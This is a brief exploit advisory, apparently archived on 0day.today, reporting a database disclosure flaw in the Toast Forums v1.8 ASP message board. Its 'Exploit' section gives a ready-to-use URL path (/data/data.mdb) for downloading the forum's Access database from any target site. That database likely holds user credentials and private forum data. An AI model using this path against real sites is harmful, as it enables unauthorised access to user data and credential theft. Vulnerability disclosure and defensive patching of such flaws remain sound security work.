id: 10338
date: 12/19/2009
title: Toast Forums v1.8 Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

===================================================
Toast Forums v1.8 Database Disclosure Vulnerability
===================================================

==============================================================================
        [»] ~ Note : Thx 2 Egyptian National Team
==============================================================================
        [»] Toast Forums v1.8 Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ Toast Forums v1.8 ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Toast Forums World's first user-skinnable message board! ]
    [»] Download:           [ http://www.toastforums.com/download/ ]
    [»] Founder:            [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://[target].com/[path]/data/data.mdb
 
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-26]  #